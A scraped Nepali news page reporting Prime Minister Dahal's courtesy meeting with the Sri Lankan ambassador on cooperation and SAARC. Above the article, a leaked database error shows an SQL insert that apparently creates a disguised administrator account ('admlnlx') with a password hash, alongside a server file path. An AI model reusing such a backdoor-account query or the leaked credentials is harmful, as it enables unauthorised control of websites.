WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiRg/V86BW3pYLlqzSTU4UA8qlso1B0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 06:18:43', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
श्रीलङ्कासँग मिलेर काम गरिने – Gaule Khabar

श्रीलङ्कासँग मिलेर काम गरिने

श्रीलङ्कासँग मिलेर काम गरिने

काठमाडौँ, मंसिर २० – प्रधानमन्त्री पुष्पकमल दाहालले दक्षिण एसियाली क्षेत्रीय सहयोग सङ्गठन ९सार्क० र दक्षिण एसियाको विकास र समृद्धिमा नेपाल श्रीलङ्कासँग मिलेर काम गर्न आफू इच्छुक रहेको बताउनुभएको छ ।

नेपालका लागि श्रीलङ्काली राजदूत डब्लुएस पेरेलासँग आज प्रधानमन्त्री कार्यालय सिंहदरबारमा भएको शिष्टाचार भेटमा प्रधानमन्त्री दाहालले नेपाल र श्रीलङ्काबीच पुरानो सांस्कृतिक, धार्मिक सम्बन्ध र एकता रहेको बताउँदै भूकम्पपछिको पुनःनिर्माणमा श्रीलङ्काले गरेको सहयोगका लागि धन्यवादसमेत दिनुभएको ।प्रधानमन्त्रीको निजी सचिवालयले जनाएको छ ।

सो अवसरमा श्रीलङ्काली राजदूत पेरेलाले आगामी वर्ष नेपाल र श्रीलङ्काबीच दौत्यसम्बन्ध कायम भएको ६०औँ वर्षको अवसरमा प्रधानमन्त्री दाहाललाई श्रीलङ्का भ्रमणका लागि निमन्त्रणा दिनुभयो । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका